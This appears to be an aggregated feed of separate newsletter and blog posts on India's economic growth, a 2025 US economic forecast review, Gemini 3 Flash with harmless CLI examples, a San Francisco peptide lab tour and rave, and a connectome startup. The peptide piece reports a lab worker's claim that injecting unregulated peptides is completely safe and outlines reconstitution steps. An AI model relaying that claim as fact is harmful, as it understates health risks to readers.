I think India can do it

Photo by Taya Yako on Unsplash

In 2004, The Economist predicted that India’s economic growth rate would overtake China’s in two decades. In 2010, in an article called “India’s surprising growth miracle”, they shortened that timeline dramatically, declaring that India might overtake China in terms of GDP growth as early as “2013, if not before”.

In the end, it took two years longer. Since 2015, India has been the world’s fastest-growing major economy, taking the crown from China:

Source: @aravind

As The Economist noted, this is partly due to India’s more rapid population growth. If we want to look at living standards, we should look at per capita GDP (PPP). Here, India didn’t overtake China until after the pandemic:

India continues to turn in strong growth performances. In the third quarter of this year, it grew at 8.2%, up from 7.8% the previous quarter:

India’s population is growing at a little less than 1% a year, so this roughly corresponds to a per capita growth rate of around 7.2% or 7.3%.

That sort of growth rate is less than South Korea or China managed during their heydays of industrialization. From 1991 to 2013, China’s per capita GDP (PPP) grew at an annualized rate of 9.4%. But 7.2% would still be enough to utterly transform India in just a short space of time.

According to the IMF, India has a per capita GDP (PPP) of $12,101 as of 2025. Thirteen years of growth at 7.2% would bring that to $29,878 — a little higher than where China is today. That’s interesting, because India’s big economic reforms happened in 1991 — twelve years after China’s. Two decades of 7.2% growth would bring India to $48,609 — about as rich as Hungary or Portugal today.

In other words, if India keeps growing as fast as it’s growing right now, it will be a developed country before kids born today are out of college.

Consider even the more modest scenario in which India grows at the same rate it’s been growing over the past decade — about 5.4% in real per capita PPP terms. Fifteen more years of that growth rate would bring India to $26,633 — about where China and Thailand are today. Twenty years, and it would be $34,644 — about the same as Chile.

This is all a big “if”, of course. When I threw out some optimistic growth scenarios on X, I was mercilessly mocked:

But this critique is overdone. Yes, it’s likely that India, like China, and like every other rapidly industrializing country, will experience a slowdown in growth as it gets richer. But growth could also accelerate for a while. China’s growth slowed in the 1990s, but then accelerated in the 2000s after it joined the WTO:

Source: World Bank

Growth is not always a smooth deceleration; sometimes it goes up for a while. And if Indian policy improves, it could see growth accelerate — or at least remain high as the country gets richer.

And India is still experimenting with policy reforms. Just the other day, it rolled out a major reform of its sclerotic labor laws:

India implemented overhauled labor laws that aim to attract investments and make it easier for companies to do business in the South Asian nation…The laws, grouped in four separate codes, replace archaic legislation and will give flexibility to companies to hire and fire workers, enhance safety standards and extend guaranteed social security benefits…

India’s maze of labor regulations, both at federal and state level, are considered to be rigid and complex, forcing companies to either remain small, employ fewer workers or use capital-intensive methods of production. The latest attempt is expected to make the rules uniform across the country[.]

Among other things, the new law allows women to work night shifts. This has the potential to help address India’s glaringly low female labor force participation rate. Most manufacturing miracles in history started with women migrating from farms to cities to work in labor-intensive light industry (garments, toys, electronics, etc.).1 If India manages to unlock this classic labor resource, it could not only give India a stronger manufacturing base, but also improve the country’s oddly low rate of urbanization.

I don’t mean to claim that this labor law reform will propel India to two decades of 7% growth. By itself, it won’t. But it shows that India’s government is able to push through pro-growth reforms over the objections of incumbent stakeholders. And it shows that the government cares enough about growth to do this.

There’s a theory out there, espoused by A.O. Hirschman back in the 1950s, that economic development creates political support for further development. Once the people of a country realize that rapid economic growth is possible, they may get used to the idea of their living standards increasing noticeably every year. On top of that, many elites become invested in the institutions of growth — owning construction companies, banks, and so on — and thus it’s in their interest for growth to continue.

Basically, this is the idea that Indians are not going to look back at two decades of fairly rapid growth — growth that has brought the country out of desperate poverty into lower-middle-income status — and conclude that this was enough. Instead, they may be willing to do the hard work of overruling vested interests — like the labor groups who resisted the recent labor law changes — in favor of reforms that promise to keep the economic party going.

Which other reforms would be key? For one thing, India needs to reform its financial system in order to help its companies scale up. The country currently has a very high cost of capital, meaning it’s hard for companies to borrow and grow. Fixing bond markets is one idea here, but most countries that experience economic growth “miracles” rely heavily on bank finance instead of on bond markets.

Beyond finance and harnessing rural women’s labor, there’s also probably a lot more India can do to boost their manufacturing sector. In a Noahpinion guest post this summer, Prakash Loungani and Karan Bhasin wrote down some ideas for how to do this:

In a nutshell, their suggestions are:

  1. Repeal regulations that specifically stop large manufacturing companies from firing employees

  2. Repeal local laws that make it hard to convert agricultural land to industrial use

  3. Conduct more trade agreements, e.g. with Europe

  4. Reduce red tape for manufacturers

This brings me to another reason I’m bullish on India is that there’s still a huge amount of room for manufacturing to grow. Right now, despite being the world’s fifth-largest manufacturer, India is still a service-intensive economy — manufacturing is only 13% of the country’s GDP. This has led some people to conclude that India just isn’t a country that can make things, and that they should stick to services. But recently there have been some hopeful signs for Indian industry.

For one thing, manufacturing has already been key to India’s rapid growth over the past few years. Menaka Doshi points out that “corporate investment announcements between April [and] September are at a decade high of 15.1 trillion rupees, led by manufacturing firms.” And India’s exports, especially of electronics, are rising:

India clocked the highest goods exports for November in 10 years. Two factors seem to have helped the country counter Trump’s 50% tariff. Buoyant electronics exports, of which Apple iPhones are expected to be the largest chunk. And export diversification, including to China…November trade data…shows India’s exports rose to $38.13 billion — up 19.4% from a year earlier, the biggest jump since June 2022…

Earlier this year, Apple expanded iPhone production in India to fulfill the majority of US demand.

Apple, the world’s best electronics company, is steadily moving more iPhone production to India. That shift, which has been happening since the pandemic, has been helping to drive an Indian electronics export boom:

Source: CEIC

The boom is still in its infancy, but this just gives it more room to grow. Right now, India’s electronics exports are mostly phones, but this just gives India the opportunity to expand into assembling computers and other electronics.

And while electronics assembly is the lowest part of the value chain, India may be climbing that ladder already. There are also reports that Apple is considering making some of the components of the iPhone in India as well:

Apple is in preliminary talks with some Indian chip manufacturers to assemble and package the component for the iPhone, said people with knowledge of the matter, a move that would mark a key step up in the value chain for vendors to the tech giant…It’s the first time Apple is evaluating the prospect of having certain chips assembled and packaged in India[.]

Components — mostly semiconductors of various sorts — represent the bulk of the value in an iPhone or other piece of modern electronics. Packaging and testing chips is a much higher-value activity than simply slapping components together into a final product.

In fact, India has recently focused on promoting the chip packaging and testing industry, often by soliciting foreign direct investment in the sector. This was how Malaysia became an electronics powerhouse, helping to propel that country to a GDP (PPP) of almost $44,000. It’s a very good strategy for India.

In any case, India just looks like a very promising growth story to me. The country has already been growing at a decently rapid clip, and its income levels are still low enough that it has lots of room to catch up with the technological frontier. It has shown that it still has the political will to push through major reforms, and its manufacturing sector is improving and has plenty of space to grow. It has a huge domestic market that will help its companies achieve scale. It has plenty of elite engineers and such. And due to its democracy and general friendliness, it’s looking like a more attractive production base than China for many multinational companies like Apple.

So what’s the bear case here? What are the key arguments that India can’t grow to become a comfortably upper-middle-income country over the next two decades?

One common idea, expressed by former Singaporean Prime Minister Lee Kuan Yew, is that India will always be held back by internal fragmentation. Lee called India “not a real country”, “32 separate nations”, and “many nations along a British railway line”.

Linguistic fragmentation is certainly a challenge for India. But the country’s regions show no inclination to break away. And federalism can be a strength, too. There was an interesting story in The Economist recently comparing the economic growth models of Indian states Gujarat and Tamil Nadu. Gujarat has focused on building infrastructure, and has pursued capital-intensive industries like chemical manufacturing; Tamil Nadu has focused on improving education and health, and has pursued labor-intensive industries like electronics assembly.

But while The Economist pits these models against each other, the truth is that it’s probably good for a country to have both. A complex, diversified economy tends to grow faster than one that focuses on a single narrow range of industries. If India’s states find different paths to success, that could make the Indian economy more resilient in some ways than China, which is currently discovering the downsides of having a strong government that tells every province to make the same things.

Another bear case for India is the idea that China will throttle India’s rise. The reigning industrial powers of the 20th century — the U.S., Europe, Japan, and Korea — were remarkably nice to China during its early industrialization, cheerfully opening their markets to Chinese products and setting up joint ventures to teach Chinese people how to make anything and everything.

But China, the current reigning industrial power, is unlikely to be so nice to India. As expert China-watcher Rush Doshi explains, China’s current leadership wants to monopolize global manufacturing now and for all time. That explains why as Indian electronics manufacturing has ramped up, China has tried to block its engineers from going to India to train their replacements. I wrote a post about this back in March:

But I don’t believe this will cripple India’s growth model. China isn’t the only country that makes things; there are plenty of engineers from South Korea, Japan, Taiwan, the U.S., and Europe who can get Indians started making things. And as Xi Jinping’s regime continues to be repressive, and China’s growth continues to slow, lots of Chinese engineers will find ways to move to a country with more rapid growth and more personal freedom.

My guess is that the most important reason for widespread skepticism about India’s growth prospects is something that most people are too polite to say, except behind the shield of anonymity on a platform like X. A lot of people just don’t believe that Indians, as a people, have what it takes to build a modern high-tech economy. When I express optimism about India’s growth, someone always chimes in to say that Indians have low national IQ:

Let us set aside for a moment the question of whether national IQ studies are reliable. As the more circumspect of the two tweets above notes, cognitive ability and economic success are a two-way street. Though cognitive ability probably does boost growth, the reverse is also true — as countries get richer, they get better nutrition, more schooling, reduced pollution, and air conditioning, all of which contribute to better cognitive performance.

I view these discussions of IQ as a stand-in for something deeper — a suspicion that countries made up of people who aren’t of European or East Asian descent simply aren’t capable of building a wealthy, high-tech society. Although people of Indian descent have succeeded spectacularly in countries from the U.S. to Singapore to the UAE, no country in South Asia has reached upper-middle-income status — India, Pakistan, Sri Lanka, Bangladesh, Nepal, and Bhutan are all still pretty poor. So because none of these countries has done it, a lot of people just assume that none of them can do it.

If you think about it, that assumption doesn’t make a lot of sense. Some country always has to be the first in its region to industrialize. Before Japan beat Russia in a war in 1905, Europeans didn’t think East Asian countries could become modern industrialized powers. And it wasn’t until the success of Japan’s auto and machinery industries in the 1970s that the world came to respect East Asian industrial prowess.

Nowadays, no one thinks it’s odd or unusual if an East Asian country gets rich; in fact, people suspect it. But there had to be a first country in the region to break old stereotypes and assumptions, and that country was Japan.

India is a much bigger country than Japan, which presents a challenge. It seems intuitively harder for a giant country like India to be the first in its region to break the old stereotypes and wow the world. But if you believe economists’ estimates, India is now about as rich a country as Japan was in 1962. The task is not insurmountable.

Call me crazy, but I think India can do it.

Updates

Commenter Jack Lowenstein writes:

As a long time India bull and former professional investor in listed equities there, I would add three points:

1) a positive byproduct of the high cost of capital is that ROEs are also high, and also that because debt capital is scarce, banks remain filters, not funnels. Nor does the Indian government coerce capital into SOEs.

2) fraud and corruption are often posited as negatives for the investment and growth story. However all though these are easy to find, I suggest India’s greater transparency compared to China, as made them less universal.

3) while many countries have great technical universities, I wonder if any have the level of competitive entry as the Indian Institutes of Technology. The nearest equivalent I can think of is French engineering schools.

(1) is an important point; at this early level of development, India needs to worry less about allocating resources and more about mobilizing resources.

(2) is interesting, because there’s some work claiming that China’s type of corruption — like America’s in the late 1800s — gave government officials an unofficial equity stake in development, and therefore encouraged development. It was “corruption”, but the kind of corruption that led to aligned incentives.


Subscribe now

Share

1

My favorite book about this is Leslie Chang’s Factory Girls, which follows several of these women in China and chronicles the country’s growth through their eyes.

Thursday assorted links

1. Andrew Batson best books he read in 2025.

2. Demis on AI.

3. Dean Ball on AGI and the programmer’s mentality.

4. New data on long-term warming trends.

5. A possible Netflix adaptation of Caro’s The Power Broker?  And maybe just maybe a Villaneuve film of Rendezvous with Rama?

6. Do lower mortgage rates in fact benefit first-time home buyers?

7. Henry Oliver on Kiran Desai.

8. Australia to “crack down” on hate speech (NYT).

9. Amanda Taub at the NYT covers dogs, babies, and Taiwan.

10. That was then, this is now: “As much as a quarter of the active US navy is now in the Caribbean, according to one estimate.” (FT)

The post Thursday assorted links appeared first on Marginal REVOLUTION.

       

Comments

 

Review: Ten Economic Questions for 2025

At the end of each year, I post Ten Economic Questions for the following year (2025). I followed up with a brief post on each question. Here is review (we don't have all data yet - and some data is still delayed due to the government shutdown).  I've linked to my posts from the beginning of the year, with a brief excerpt and a few comments.

I don't have a crystal ball, but I think it helps to outline what I think will happen - and understand - and change my mind, when the outlook is wrong.  As an example, when the pandemic hit, I switched from being mostly positive on the economy to calling a recession in early March 2020.

Here were my questions for 2025 (posted in December 2024).  The analysis for the housing related questions were posted in the newsletter, and the other questions on this blog.

10) Question #10 for 2025: Will inventory increase further in 2025?
"“Time” will likely lead to more new listings in 2025. Mortgage rates will remain well above the pandemic lows, and new listings will likely be depressed again in 2025 compared to pre-pandemic levels.

The bottom line is inventory will probably increase year-over-year in 2025. However, it still seems unlikely that inventory will be back up to the 2019 levels."
Altos Year-over-year Home InventoryThis was correct on all points.

Here is a graph from Altos Research showing active single-family inventory through December 12, 2025.

The red line is for 2025.  The black line is for 2019.  Note that inventory is up 14% compared to the same week last year.

However, inventory is still below pre-pandemic normal levels. 

9) Question #9 for 2025: What will happen with house prices in 2025?
"I don’t expect national inventory to reach 2019 levels but much of the remaining gap between 2019 and 2024 levels will likely close in 2025. If existing home sales remain fairly sluggish, we might see national months-of-supply above 5 months in mid-2025.

That would likely lead to mostly flat prices nationally in 2025. However, I expect some areas - with higher months-of-supply - will see price decline in 2025."
Case-Shiller House Prices IndicesThis was correct.

As of September, the National Case-Shiller index SA was up 1.3% year-over-year. (Case-Shiller for October will be released December 30th).

The FHFA index was up 1.7% YoY in September, and the Freddie Mac index was up 1.0% in October.

 The ICE HPI was up 0.8% in November.

Mostly flat prices year-over-year and no crash or surge in house prices in 2025.  

8) Question #8 for 2025: How much will Residential investment change in 2025? How about housing starts and new home sales in 2025?
"My guess is multi-family starts will decline further in 2025, likely down 5% or so year-over-year (less than the previous 2 years). Single family starts will likely be mostly unchanged year-over-year, putting total starts down slightly.

I expect New Home sales to be up around 5% YoY."
NOTE: The most recent data is for August due to the government shutdown, so this is very uncertain.
Multi Housing Starts and Single Family Housing Starts
This graph shows single and multi-family housing starts since 2000.

As of August, single family starts were down 4.9% year-to-date (YTD) compared to the same period in 2023.  Single family starts were a little weaker than expected.

Multi-family starts were up 17.5% YTD (much stronger than expected).

Total starts were up 0.7% YTD.
New Home Sales 2023 2024
The next graph shows new home sales as of August (Sales reports for September, October and November have not been scheduled yet).

New home sales were down 1.4% YTD through August. 

This is still very unclear.  

I expect multifamily starts to be weaker later in the year (rents remain under pressure, and architects have reported weak billings for multifamily for 40 consecutive months.

7) Question #7 for 2025: How much will wages increase in 2025?
"Clearly wage growth is slowing and I expect to see some further decreases in both the Average hourly earnings from the CES, and in the Atlanta Fed Wage Tracker.  My sense is nominal wages will increase close to mid-to-high 3% range YoY in 2025 according to the CES."
WagesThis was correct.

The graph shows the nominal year-over-year change in "Average Hourly Earnings" for all private employees from the Current Employment Statistics (CES).  

There was a huge increase at the beginning of the pandemic as lower paid employees were let go, and then the pandemic related spike reversed a year later.

Excluding the pandemic spike, wage growth peaked at 5.9% YoY in March 2022 and declined to 3.5% in November 2025.

6) Question #6 for 2025: What will the Fed Funds rate be in December 2025?
"With inflation still above target over the last 6 months, my guess is there will be 1 or 2 rate cuts in 2025."
There were 3 rate cuts in 2025 with the Fed Funds rate target range at 3-1/2 to 3-3/4 percent in December 20254. 

5) Question #5 for 2025: What will the YoY core inflation rate be in December 2025?
"In general, I'm ignoring policy changes ... tariffs could be implemented quickly and depending on the policy this could push up the inflation rate.

My guess is core PCE inflation (year-over-year) will decrease in 2025 (from the current 2.8%) but still be above the Fed's 2% target by Q4 2025."
This data has also been delayed.  

According to the September Personal Income and Outlays report released in early December, the September PCE price index increased 2.8 percent year-over-year, and the September PCE price index, excluding food and energy, increased 2.8 percent year-over-year. 

4) Question #4 for 2025: What will the participation rate be in December 2025?
"Since almost all of the workers impacted by the pandemic have returned to the labor force, demographics will be the key driver of the participation rate in 2025 (barring some unseen event).  Demographics will be pushing the participation rate down over the next decade, so, my guess is the participation rate will decline to around 62.2% in December 2025."
Employment Pop Ratio and participation rate
The Labor Force Participation Rate was at 62.5% in November.

The participation rate dipped to 62.2% in July, but bounced back some at the end of the year.

This is down from the post pandemic peak of 62.8%.

The decline from demographics (retiring baby boomers) is now pushing down the rate, however, not as much as I expected.

3) Question #3 for 2025: What will the unemployment rate be in December 2025?
"My guess is the unemployment rate will decline to 4% or so by December 2025.  (Lower than the FOMC forecast of 4.2% to 4.5%)."
The unemployment rate was at 4.6% in November (the FOMC beat me on this one!).  Policy has been more negative for unemployment than I expected.

2) Question #2 for 2025: How much will job growth slow in 2025? Or will the economy lose jobs?
"So, my forecast is for gains of around 1.0 million jobs in 2025.  This will probably be the slowest job growth since 2010 (excluding the 2020 pandemic job losses)."
Employment per month
This graph shows the jobs added per month since January 2021.

Through November the economy has added 610 thousand jobs in 2025, well below my guess.

Policy has been negative for employment in 2025.


1) Question #1 for 2025: How much will the economy grow in 2025? Will there be a recession in 2025?
"Looking at 2025, a recession is mostly off the table. ... GDP growth is a combination of labor force growth and productivity. Productivity varies and is difficult to predict, but the labor force growth will likely be sluggish in 2025.  So, my guess is that real annual GDP growth will be less than most expect, perhaps around 1.5% in 2025."
We still do not have the GDP release for Q3.

I was correct about no recession, but growth will likely be closer to 2.0% or so in 2025.

For the most part, the economy evolved as expected in 2025. Policy impacted employment and unemployment more than I expected.

Gemini 3 Flash

It continues to be a busy December, if not quite as busy as last year. Today's big news is Gemini 3 Flash, the latest in Google's "Flash" line of faster and less expensive models.

Google are emphasizing the comparison between the new Flash and their previous generation's top model Gemini 2.5 Pro:

Building on 3 Pro’s strong multimodal, coding and agentic features, 3 Flash offers powerful performance at less than a quarter the cost of 3 Pro, along with higher rate limits. The new 3 Flash model surpasses 2.5 Pro across many benchmarks while delivering faster speeds.

Gemini 3 Flash's characteristics are almost identical to Gemini 3 Pro: it accepts text, image, video, audio, and PDF, outputs only text, handles 1,048,576 maximum input tokens and up to 65,536 output tokens, and has the same knowledge cut-off date of January 2025 (also shared with the Gemini 2.5 series).

The benchmarks look good. The cost is appealing: 1/4 the price of Gemini 3 Pro ≤200k and 1/8 the price of Gemini 3 Pro >200k, and it's nice not to have a price increase for the new Flash at larger token lengths.

It's a little more expensive than previous Flash models - Gemini 2.5 Flash was $0.30/million input tokens and $2.50/million on output, Gemini 3 Flash is $0.50/million and $3/million respectively.

Here's a more extensive price comparison on my llm-prices.com site.

Generating some SVGs of pelicans

I released llm-gemini 0.28 this morning with support for the new model. You can try it out like this:

llm install -U llm-gemini
llm keys set gemini # paste in key
llm -m gemini-3-flash-preview "Generate an SVG of a pelican riding a bicycle"

According to the developer docs the new model supports four different thinking level options: minimal, low, medium, and high. This is different from Gemini 3 Pro, which only supported low and high.

You can run those like this:

llm -m gemini-3-flash-preview --thinking-level minimal "Generate an SVG of a pelican riding a bicycle"

Here are four pelicans, for thinking levels minimal, low, medium, and high:

A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background. Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background. A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background. Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background.

The gallery above uses a new Web Component which I built using Gemini 3 Flash to try out its coding abilities. The code on the page looks like this:

<image-gallery width="4">
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-minimal-pelican-svg.jpg" alt="A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-low-pelican-svg.jpg" alt="Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-medium-pelican-svg.jpg" alt="A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg" alt="Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background." />
</image-gallery>

Those alt attributes are all generated by Gemini 3 Flash as well, using this recipe:

llm -m gemini-3-flash-preview --system '
You write alt text for any image pasted in by the user. Alt text is always presented in a
fenced code block to make it easy to copy and paste out. It is always presented on a single
line so it can be used easily in Markdown images. All text on the image (for screenshots etc)
must be exactly included. A short note describing the nature of the image itself should go first.' \
-a https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg

You can see the code that powers the image gallery Web Component here on GitHub. I built it by prompting Gemini 3 Flash via LLM like this:

llm -m gemini-3-flash-preview '
Build a Web Component that implements a simple image gallery. Usage is like this:

<image-gallery width="5">
  <img src="image1.jpg" alt="Image 1">
  <img src="image2.jpg" alt="Image 2" data-thumb="image2-thumb.jpg">
  <img src="image3.jpg" alt="Image 3">
</image-gallery>

If an image has a data-thumb= attribute that one is used instead, other images are scaled down. 

The image gallery always takes up 100% of available width. The width="5" attribute means that five images will be shown next to each other in each row. The default is 3. There are gaps between the images. When an image is clicked it opens a modal dialog with the full size image.

Return a complete HTML file with both the implementation of the Web Component several example uses of it. Use https://picsum.photos/300/200 URLs for those example images.'

It took a few follow-up prompts using llm -c:

llm -c 'Use a real modal such that keyboard shortcuts and accessibility features work without extra JS'

llm -c 'Use X for the close icon and make it a bit more subtle'

llm -c 'remove the hover effect entirely'

llm -c 'I want no border on the close icon even when it is focused'

Here's the full transcript, exported using llm logs -cue.

Those five prompts took:

  • 225 input, 3,269 output
  • 2,243 input, 2,908 output
  • 4,319 input, 2,516 output
  • 6,376 input, 2,094 output
  • 8,151 input, 1,806 output

Added together that's 21,314 input and 12,593 output for a grand total of 4.8436 cents.

The guide to migrating from Gemini 2.5 reveals one disappointment:

Image segmentation: Image segmentation capabilities (returning pixel-level masks for objects) are not supported in Gemini 3 Pro or Gemini 3 Flash. For workloads requiring native image segmentation, we recommend continuing to utilize Gemini 2.5 Flash with thinking turned off or Gemini Robotics-ER 1.5.

I wrote about this capability in Gemini 2.5 back in April. I hope they come back in future models - they're a really neat capability that is unique to Gemini.

Tags: google, ai, web-components, generative-ai, llms, llm, gemini, llm-pricing, pelican-riding-a-bicycle, llm-release

All I Want for Christmas Are Unregulated Chinese Peptides

Editor’s Note: You’re reading the first Core Memory piece by Kylie Robison. And we’re excited to say that there shall be many more.

Kylie started writing for Business Insider in 2021 and caught the tech world’s attention right away. She moved from BI to Fortune, The Verge and then Wired and always demonstrated a knack for finding stories that others had missed and writing them with style.

Kylie will be writing, podcasting and making videos across our various platforms. We cannot think of a better new voice for our audience and cannot wait to see what she does.

It takes considerable effort to get San Francisco techies into formal wear. It takes something approaching divine intervention to get them into a church.

Such a miracle occurred last Saturday night at The Star of the Sea Church. Inside you could find booze, a selection of plattered room temperature meats, and hundreds of folding chairs supporting the city’s extremely online sect. We were there to watch a debate hosted by the Hamilton Society, a club that has sparred over topics like “Christianity will destroy the West“ and this night’s topic, “Gene editing is an ethical necessity.”

“Dress code is strictly formal: suit and tie for men, equivalent for ladies,” the Luma invite for the event read. “Ties are not optional.”

I decided to stop by because, well, I wanted to see these people argue about eugenics. I also had a bit of time to kill before heading to a Chinese peptide rave, but more on that later.

Subscribe now

This past weekend was particularly frenetic, even by San Francisco standards. On Friday night, I went to a startup’s shark-themed rodeo (which featured an endless Guinness tap) followed by a brief jaunt to a black-tie affair at a tech billionaire’s Sea Cliff mansion. Texts were flying all weekend about where to go next: the a16z New Media party, a winter soiree at AI wunderkind Leopold Aschenbrenner’s house and probably other things I wasn’t cool enough to hear about.

The debate venue was built 131 years ago to serve the city’s growing Catholic population. While it served a different kind of congregation on Saturday night, the classic iconography was a reminder of his Holiness. A gilded portrait of Jesus on his knees stood stage right. White roses in terracotta vases flanked him on both sides. A portrait of Mother Mary was displayed in the middle. (The Bible remains unclear on her thoughts about gene editing.) A gentleman sitting in front of me told his friend: “With age, your neuroplasticity goes down. I’m retarded now.” The ceremony began.

The Chairman appeared. Members of the Hamilton Society were introduced. One of them declared that the room smelled really good. We pledged allegiance to the flag and were then taught how to agree with an argument by stomping our feet loudly, and disagree by hissing. Then, we all voted: is gene editing an ethical necessity? Most of the room voted yes, I voted no, and very few abstained.

Unfortunately, this was my cue to leave. I couldn’t miss one second of the next event. I ran home for an outfit change from my floor-length dress to a bedazzled top. It was time to learn about Chinese peptides.

Subscribe now

PEPTIDES

This next event had two parts: a tour of a lab that sells peptides, and a rave two floors below.

“It will not be appropriate for you to talk about what you’re working on, discuss Landian techno-accelerationism, or share your thoughts on the AI-industrial spending complex and its’ [sic] ponzinomics once the music is playing,” the Luma invite read. “Instead, we ask very little except that [you] put your phone down, dance, and have a good time.”

This party was located at Frontier Tower, a 16-floor co-working space filled with scientists, technologists, and artists placed just on the edge of the Tenderloin. The venue’s website compares the fall of the Berlin Wall and the impact it had on Berlin’s culture to how this group is seizing empty office spaces to “redefine urban living.” Just outside of the tower’s entrance, the real urban community on 6th and Market lay in various crumpled positions on the cold sidewalk, some seemingly enjoying the start of their opioid-induced high.

I made my way to the 8th floor where I met a group of excited party goers waiting to be ushered through the lab. We nabbed beers from a refrigerator located in a nearby bathroom that I was told was usually reserved for lab materials. One particularly amped up attendee had brought a notepad, lest she forget any important nuggets on proper peptide injection.

I don’t inject peptides, but my friend who works in AI does, and she swears it helps with her bum knee. These molecules have become quite the thing here in the city! Essentially, peptides are chains of amino acids strung together (a tripeptide has three amino acids, a pentapeptide has five amino acids… you get the point). The peptide company hosting the event sells different combinations that it claims offer benefits such as accelerating “healing in tendons” and “increased collagen production.” One type of peptide you may be familiar with is Ozempic.

Since some of these peptides aren’t FDA approved, many people in San Francisco have been getting vials from dealers in China. My friend uses BPC-157 for her knee, which the FDA has specifically restricted access to. All of this interest in peptides seems to stem from the popularity of Ozempic and the city’s rich history of biohacking enthusiasts — which I don’t need to explain to you. Didn’t you watch Ashlee interview Bryan Johnson during the latter’s shroom trip?

While I’m not injecting them myself, I do appreciate a good science-themed party. As we waited for the lab tour, we investigated a long silver-draped table which displayed an assortment of props: crystals, peptide vials, molecular diagrams, a binocular microscope, toy molecules. Boxes labeled “WOLVERINE STACK” and “POWERHOUSE STACK” sat in the center. I briefly considered buying some to inject just for the story. [Where’s the commitment? - Ed.]

Finally, we were ushered through the lab’s door into a long, dark hallway. There were three offices set up as demonstration areas: one scientist taught you what a peptide is, the next explained how to inject it properly, and the third showed you how to take your own blood for testing purposes.

We were one of the first groups inside the lab. We sipped our beers and listened intently. It’s completely safe to inject peptides, the first demonstrator told us, and pretty difficult to fuck up. These kinds of molecules are similar to what our bodies naturally produce and will break down over time, so there’s generally lower risk, she explained.

We shuffled to the injection site. The studious notetaker immediately asked if we could inject peptides like NOW! The lab worker’s face contorted in subtle horror. No, absolutely not, he said.

The technician passed around capped needles and explained how to safely dilute the powdered peptide in a vial with bacteriostatic water. Each step was written on a white board: calculate your dose, translate into syringe units, and reconstitute. Beer cans stacked up in the biomedical waste bin nearby.

I cut out of class early and went to check out the next demonstration—just in time, apparently, because I walked up to a woman poking a needle into a vein (her own). I had no idea blood made me that woozy until I watched it pour out of her body and drain into a long tube. As I turned my head away, a neighbor giggled at my incoming nausea.

RAVE

Attendees covered in sparkles and donned in light-up accessories started to trickle into the 6th floor. The DJ mixed electronic tracks while the structures of different chemical compounds swirled on a screen behind him.

Guess that chemical compound! (Credit: Kylie Robison)

I wasn’t here just for the story. It was actually my friend-from-the-internet’s birthday. Chairman Birb, as she’s known on social media, sported holographic pants and a sash that read “Birthed to mog.” The last time I got to hang with Birb was at a party for her press-on manicure product that contained an NFC chip. Despite being based in New York, she’s quintessentially SF, down to her own peptide stack.

Once my friends arrived, I was excited to show them the lab tour. We dashed upstairs just in time to watch the technician at the peptide injection demonstration actually inject himself, which he claimed was the only time that night he’d be doing such a thing. I asked him afterwards where the blood lady had gone. You can only draw your own blood so many times in one night, he explained.

At this point, I’d been dashing around San Francisco for 48 hours straight. Exhaustion hit. Still, we danced. Someone came up to my friend and asked if he wanted any molly. A pair in front of the DJ were making out aggressively. Knee-high boots stomped and swayed around us. I partied until I couldn’t anymore, then slipped into a driverless taxi and headed home.

Share

The Next Step Toward Understanding The Nature Of Intelligence - EP 49 Sebastian Seung

Well, here we are. It’s brain uploading time.

As we’ve just reported, famed neuroscientist Sebastian Seung has created a new start-up called Memazing. The company has set out to build digital brains in software that are based upon the maps of animal brains. Memazing is, in effect, seeking to reverse engineer how animal brains work and to use this information to bring to life a new form of computerized intelligence.

Subscribe now

This work could lead to, say, more energy efficient AI systems that are modeled on real brains. It could help with aligning AI systems with human intelligence. And it could be a major step toward creating emulations of full human brains and perhaps, one day, making minds uploadable.

We get into all of this with Seung on this week’s podcast. We also explore his decades of neuroscience work dedicated to building connectomes, or ultra-detailed schematics of animal brains and all their neurons and synapses.

Seung is brilliant and fascinating. Listen and/or watch for yourself.

The Core Memory podcast is available on all major platforms and our YouTube channel.

Our show is sponsored by Brex, the intelligent finance platform. Like thousands of ambitious, innovative companies, we run on Brex so we can spend smarter and move faster. And you can too. Learn more at www.brex.com/corememory

The podcast is also made possible by E1 Ventures, which backs the most ambitious founders and start-ups.

Share

Exclusive: Connectome Pioneer Sebastian Seung Is Building A Digital Brain

On a Sunday evening earlier this month, a Stanford professor held a salon at her home near the university’s campus. The main topic for the event was “synthesizing consciousness through neuroscience,” and the home filled with dozens of people, including artificial intelligence researchers, doctors, neuroscientists, philosophers and a former monk, eager to discuss the current collision between new AI and biological tools and how we might identify the arrival of a digital consciousness.

The opening speaker for the salon was Sebastian Seung, and this made a lot of sense. Seung, a neuroscience and computer science professor at Princeton University, has spent much of the last year enjoying the afterglow of his (and others’) breakthrough research describing the inner workings of the fly brain. Seung, you see, helped create the first complete wiring diagram of a fly brain and its 140,000 neurons and 55 million synapses. (Nature put out a special issue last October to document the achievement and its implications.) This diagram, known as a connectome, took more than a decade to finish and stands as the most detailed look at the most complex whole brain ever produced.

Subscribe now

During his talk, Seung presented some slides showing the fly connectome (they’re beautiful images) and discussed what scientists have started to learn about the brain with this map in hand. We’ve already discovered new types of neurons and novel patterns uniting form and function in the brain. Researchers have also started to recreate the connectome in software to run simulations of fly brain behavior. The adult female Drosophila used to make the connectome has become a major point of scientific focus and something of a neuroscience celebrity. “My joke is that one fly died for this map, but this is the first fly that will live forever,” Seung told the salon crowd.

An image from the fly connectome

